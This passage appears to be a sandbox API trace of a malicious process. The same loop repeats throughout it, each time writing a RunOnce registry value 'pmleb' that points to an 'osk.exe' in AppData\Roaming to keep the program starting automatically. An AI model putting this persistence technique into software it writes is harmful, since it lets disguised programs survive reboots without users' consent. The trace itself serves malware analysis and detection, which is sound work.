uIDEvent=0x2480) returned 1 [0110.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.985] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.985] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.985] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.985] RegCloseKey (hKey=0x280) returned 0x0 [0110.985] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.985] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.985] SetTimer (hWnd=0x20280, nIDEvent=0x2481, uElapse=0xa, lpTimerFunc=0x0) returned 0x2481 [0110.985] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.999] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.000] KillTimer (hWnd=0x20280, uIDEvent=0x2481) returned 1 [0111.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.000] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.001] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.001] RegCloseKey (hKey=0x280) returned 0x0 [0111.001] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.001] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.001] SetTimer (hWnd=0x20280, nIDEvent=0x2482, uElapse=0xa, lpTimerFunc=0x0) returned 0x2482 [0111.001] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.015] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.015] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.015] KillTimer (hWnd=0x20280, uIDEvent=0x2482) returned 1 [0111.016] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.016] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.016] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.016] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.016] RegCloseKey (hKey=0x280) returned 0x0 [0111.016] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.017] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.017] SetTimer (hWnd=0x20280, nIDEvent=0x2483, uElapse=0xa, lpTimerFunc=0x0) returned 0x2483 [0111.017] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.031] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.031] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.031] KillTimer (hWnd=0x20280, uIDEvent=0x2483) returned 1 [0111.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0111.032] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.032] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.032] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.032] RegCloseKey (hKey=0x280) returned 0x0 [0111.032] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.033] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.033] SetTimer (hWnd=0x20280, nIDEvent=0x2484, uElapse=0xa, lpTimerFunc=0x0) returned 0x2484 [0111.033] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.047] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.047] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.047] KillTimer (hWnd=0x20280, uIDEvent=0x2484) returned 1 [0111.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.047] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.048] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.048] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.048] RegCloseKey (hKey=0x280) returned 0x0 
[0111.048] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.048] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.048] SetTimer (hWnd=0x20280, nIDEvent=0x2485, uElapse=0xa, lpTimerFunc=0x0) returned 0x2485 [0111.048] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.063] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.063] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.063] KillTimer (hWnd=0x20280, uIDEvent=0x2485) returned 1 [0111.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.063] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.063] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.064] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.064] RegCloseKey (hKey=0x280) returned 0x0 [0111.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.064] SetTimer (hWnd=0x20280, nIDEvent=0x2486, uElapse=0xa, lpTimerFunc=0x0) returned 0x2486 [0111.064] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.077] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.077] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.078] KillTimer (hWnd=0x20280, uIDEvent=0x2486) returned 1 [0111.078] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.078] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.078] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.078] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.079] RegCloseKey (hKey=0x280) returned 0x0 [0111.079] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.079] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.079] SetTimer (hWnd=0x20280, nIDEvent=0x2487, uElapse=0xa, lpTimerFunc=0x0) returned 0x2487 [0111.079] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.093] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.093] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.093] KillTimer (hWnd=0x20280, uIDEvent=0x2487) returned 1 [0111.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.094] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.094] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.094] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.094] RegCloseKey (hKey=0x280) returned 0x0 [0111.094] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.094] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.094] SetTimer (hWnd=0x20280, nIDEvent=0x2488, uElapse=0xa, lpTimerFunc=0x0) returned 0x2488 [0111.094] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.109] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.109] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.109] KillTimer (hWnd=0x20280, uIDEvent=0x2488) returned 1 [0111.109] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.110] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.110] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.110] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.110] RegCloseKey (hKey=0x280) returned 0x0 [0111.110] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.110] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.110] SetTimer (hWnd=0x20280, nIDEvent=0x2489, uElapse=0xa, lpTimerFunc=0x0) returned 0x2489 [0111.110] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.124] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.124] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.124] KillTimer (hWnd=0x20280, uIDEvent=0x2489) returned 1 [0111.125] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.125] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.125] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.126] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.126] RegCloseKey (hKey=0x280) returned 0x0 [0111.126] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.126] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.126] SetTimer (hWnd=0x20280, nIDEvent=0x248a, uElapse=0xa, lpTimerFunc=0x0) returned 0x248a [0111.126] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.140] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.140] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.140] KillTimer (hWnd=0x20280, uIDEvent=0x248a) returned 1 [0111.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.141] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.141] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.141] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.141] RegCloseKey (hKey=0x280) returned 0x0 [0111.141] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.141] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0111.141] SetTimer (hWnd=0x20280, nIDEvent=0x248b, uElapse=0xa, lpTimerFunc=0x0) returned 0x248b [0111.142] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.156] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.156] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.156] KillTimer (hWnd=0x20280, uIDEvent=0x248b) returned 1 [0111.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.157] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.157] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.157] RegCloseKey (hKey=0x280) returned 0x0 [0111.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.157] SetTimer (hWnd=0x20280, nIDEvent=0x248c, uElapse=0xa, lpTimerFunc=0x0) returned 0x248c [0111.157] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.171] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.171] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.171] KillTimer (hWnd=0x20280, uIDEvent=0x248c) returned 1 [0111.172] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.172] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.172] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.172] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.173] RegCloseKey (hKey=0x280) returned 0x0 [0111.173] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.173] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.173] SetTimer (hWnd=0x20280, nIDEvent=0x248d, uElapse=0xa, lpTimerFunc=0x0) returned 0x248d [0111.173] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.187] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.187] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.188] KillTimer (hWnd=0x20280, uIDEvent=0x248d) returned 1 [0111.188] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.189] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.189] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.189] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.189] RegCloseKey (hKey=0x280) returned 0x0 [0111.189] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.190] SetTimer (hWnd=0x20280, nIDEvent=0x248e, uElapse=0xa, lpTimerFunc=0x0) returned 0x248e 
[0111.190] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.202] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.202] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.203] KillTimer (hWnd=0x20280, uIDEvent=0x248e) returned 1 [0111.203] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.203] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.203] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.204] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.204] RegCloseKey (hKey=0x280) returned 0x0 [0111.204] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.204] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.204] SetTimer (hWnd=0x20280, nIDEvent=0x248f, uElapse=0xa, lpTimerFunc=0x0) returned 0x248f [0111.204] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.218] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.218] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.218] KillTimer (hWnd=0x20280, uIDEvent=0x248f) returned 1 [0111.219] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.219] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.219] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.219] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.219] RegCloseKey (hKey=0x280) returned 0x0 [0111.220] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.220] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.220] SetTimer (hWnd=0x20280, nIDEvent=0x2490, uElapse=0xa, lpTimerFunc=0x0) returned 0x2490 [0111.220] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.246] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.246] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.246] KillTimer (hWnd=0x20280, uIDEvent=0x2490) returned 1 [0111.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.247] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.248] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.248] RegCloseKey (hKey=0x280) returned 0x0 [0111.248] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.248] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.248] SetTimer (hWnd=0x20280, nIDEvent=0x2491, uElapse=0xa, lpTimerFunc=0x0) returned 0x2491 [0111.248] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0111.249] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.249] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.249] KillTimer (hWnd=0x20280, uIDEvent=0x2491) returned 1 [0111.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.250] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.250] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.250] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.250] RegCloseKey (hKey=0x280) returned 0x0 [0111.250] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.251] SetTimer (hWnd=0x20280, nIDEvent=0x2492, uElapse=0xa, lpTimerFunc=0x0) returned 0x2492 [0111.251] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.265] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.265] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.266] KillTimer (hWnd=0x20280, uIDEvent=0x2492) returned 1 [0111.266] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.266] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.267] RegSetValueExA (in: 
